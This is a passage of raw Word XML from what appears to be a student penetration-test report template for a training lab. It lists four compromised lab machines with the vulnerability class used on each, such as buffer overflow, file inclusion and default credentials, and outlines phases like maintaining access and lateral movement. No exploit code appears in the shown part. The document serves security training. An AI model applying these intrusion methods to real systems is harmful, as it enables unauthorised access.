            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00014DAC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="495426DF" w14:textId="00AB2956" w:rsidR="00DB5768" w:rsidRDefault="00C53697">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="underscore" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc39759513" w:history="1">
        <w:r w:rsidR="00DB5768" w:rsidRPr="0040299D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Exploitation Details: Internal Subnet (10.0.0.0/16)</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc39759513 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00014DAC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3C6416BF" w14:textId="3C8ADA8F" w:rsidR="00DB5768" w:rsidRDefault="00C53697">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="underscore" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc39759514" w:history="1">
        <w:r w:rsidR="00DB5768" w:rsidRPr="0040299D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>System IP 10.0.0.138 (Brainpan)</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc39759514 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00014DAC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="66C98024" w14:textId="3C90A98B" w:rsidR="00DB5768" w:rsidRDefault="00C53697">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="underscore" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc39759515" w:history="1">
        <w:r w:rsidR="00DB5768" w:rsidRPr="0040299D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>System IP 10.0.0.139 (Kioptrix2014)</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc39759515 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00014DAC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B45CE5A" w14:textId="6486FE50" w:rsidR="00DB5768" w:rsidRDefault="00C53697">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="underscore" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc39759516" w:history="1">
        <w:r w:rsidR="00DB5768" w:rsidRPr="0040299D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>System IP 10.0.100.105 (Zico)</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc39759516 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00014DAC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="200A3467" w14:textId="3FB87658" w:rsidR="00DB5768" w:rsidRDefault="00C53697">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="underscore" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc39759517" w:history="1">
        <w:r w:rsidR="00DB5768" w:rsidRPr="0040299D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>System IP 10.0.100.107 (LazyAdmin)</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc39759517 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00014DAC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>28</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1CD77001" w14:textId="0F8DAC92" w:rsidR="00DB5768" w:rsidRPr="00DB5768" w:rsidRDefault="00DB5768" w:rsidP="00DB5768">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE964" w14:textId="246B6976" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc39759500"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Outline</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="70FCE965" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="introduction"/>
      <w:bookmarkStart w:id="7" w:name="_Toc39759501"/>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="70FCE966" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>The Example Lab penetration test report contains all efforts that were conducted in order to pass The Example Lab. This report will be graded from a standpoint of correctness and fullness to all aspects of the Lab. The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as technical knowledge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE967" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="objective"/>
      <w:bookmarkStart w:id="9" w:name="_Toc39759502"/>
      <w:r>
        <w:t>Objective</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="70FCE968" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>The objective of this assessment is to perform an internal penetration test against the Example Lab network. The student is tasked with following a methodical approach in obtaining access to the objective goals. This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report. An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this course. Use the sample report as a guideline to get you through the reporting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE969" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="requirements"/>
      <w:bookmarkStart w:id="11" w:name="_Toc39759503"/>
      <w:r>
        <w:t>Requirements</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="70FCE96A" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>The student will be required to fill out this penetration testing report fully and to include the following sections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE96B" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Overall High-Level Summary and Recommendations (non-technical)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE96C" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Methodology walkthrough and detailed outline of steps taken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE96D" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE96E" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Any additional items that were not included</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE96F" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="high-level-summary"/>
      <w:bookmarkStart w:id="13" w:name="_Toc39759504"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>High-Level Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="70FCE970" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>The author of this report was tasked with performing an internal penetration test towards The Example Lab environment. An internal penetration test is a dedicated offensive simulation against internally connected systems. The focus of this test is to perform attacks, similar to those of a malicious hacker and attempt to infiltrate internal Lab systems – including but not limited to the internal domain. The overall objective was to evaluate the network, identify systems, and exploit vulnerabilities, ultimately reporting back findings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE971" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>During the assessment, several alarming vulnerabilities were identified on internal networks. When performing the attacks, the author was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. During the tests, all systems were succesfully compromised, granting full control over every system in the network. These systems, as well as a brief description on how access was obtained, are listed in the section below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE972" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="overview-of-compromised-machines"/>
      <w:bookmarkStart w:id="15" w:name="_Toc39759505"/>
      <w:r>
        <w:t>Overview of Compromised Machines</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="70FCE973" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>It should be noted that this section solely provides a high-level description of the vulnerability which was exploited to gain a foothold on the machine. For details on lateral movement and privilege escalation within each box, please refer to the details provided in the ‘exploitation details’ chapters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE974" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>10.0.0.138 (BrainPan) - Buffer Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE975" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>10.0.0.139 (Kioptrix2014) - Local File Inclusion and remote code execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE976" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>10.0.100.105 (Zico) - Default credentials and arbitrary file write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE977" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>10.0.100.107 (LazyAdmin) - Misconfigured SMB share and weak credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE978" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="recommendations"/>
      <w:bookmarkStart w:id="17" w:name="_Toc39759506"/>
      <w:r>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="70FCE979" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>It is strongly recommended to patch the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. For each application, patching recommendations are provided.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE97A" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>One thing to note is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE97B" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="methodologies"/>
      <w:bookmarkStart w:id="19" w:name="_Toc39759507"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Methodologies</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="70FCE97C" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>A widely adopted approach to performing penetration testing was utilized during the tests to test how well The Example Lab environments are secured. Below, a breakdown of the applied methodology is provided.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE97D" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="information-gathering"/>
      <w:bookmarkStart w:id="21" w:name="_Toc39759508"/>
      <w:r>
        <w:t>Information Gathering</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="70FCE97E" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, the objective was to exploit the exam network. One IP range is in scope:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE97F" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The ‘internal’ subnet: 10.0.0.0/16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE980" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>As part of the Information Gathering phase, both passive and active scans were performed to gather information about open ports and running services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE981" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="penetration"/>
      <w:bookmarkStart w:id="23" w:name="_Toc39759509"/>
      <w:r>
        <w:t>Penetration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="70FCE982" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The penetration testing portions of the assessment focus on gaining access to a variety of systems. During this penetration test, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> out of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> systems were succesfully and completely compromised. The next chapters provide an overview of the identified services and exploited vulnerabilities for every machine, as well as the proof keys for every compromised machine and recommendations for mitigating the identified vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE983" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="maintaining-access"/>
      <w:bookmarkStart w:id="25" w:name="_Toc39759510"/>
      <w:r>
        <w:t>Maintaining Access</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="70FCE984" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Maintaining access to a system is important to attackers, ensuring that access to a system can be regained after it has been exploited is invaluable. The ‘maintaining access’ phase of the penetration test focuses on ensuring that once the attack has been executed, an attacker can easily regain administrative access over the system. Additionally, certain exploits may only be executable once. As such, having a foothold into a system proves invaluable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE985" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="lateral-movement"/>
      <w:bookmarkStart w:id="27" w:name="_Toc39759511"/>
      <w:r>
        <w:t>Lateral Movement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="70FCE986" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>As part of the engagement, exploitation in closed subnets was requested, requiring lateral movement from compromised hosts. Furthermore, lateral movement within subnets was realized through the use of known credentials from compromised hosts. Technical details on lateral movement are provided in the next chapter, and a full overview of compromised credentials is provided in the appendix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE987" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="house-cleaning"/>
      <w:bookmarkStart w:id="29" w:name="_Toc39759512"/>
      <w:r>
        <w:t>House Cleaning</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="70FCE988" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>The ‘house cleaning’ portions of the assessment ensures that remnants of the penetration test are removed. Often fragments of tools or user accounts are left on an organization’s computer which can cause security issues down the road. Ensuring that no remnants of our penetration test are left over is important.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE989" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>After all proof keys were collected from the lab networks, all user accounts, passwords, as well as the Meterpreter services installed on the system were removed. No additional cleanup should be required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE98A" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="X2f33a80f3a0170d6e7a5fdbda53e8666faccd47"/>
      <w:bookmarkStart w:id="31" w:name="_Toc39759513"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploitation Details: Internal Subnet (10.0.0.0/16)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="70FCE98B" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="system-ip-10.0.0.138-brainpan"/>
      <w:bookmarkStart w:id="33" w:name="_Toc39759514"/>
      <w:r>
        <w:t>System IP 10.0.0.138 (Brainpan)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="70FCE98C" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="system-overview"/>
      <w:r>
        <w:t>System overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="pct"/>
        <w:tblLook w:val="07C0" w:firstRow="0" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1620"/>
        <w:gridCol w:w="1150"/>
      </w:tblGrid>
      <w:tr w:rsidR="00863B21" w14:paraId="70FCE98F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCE98D" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
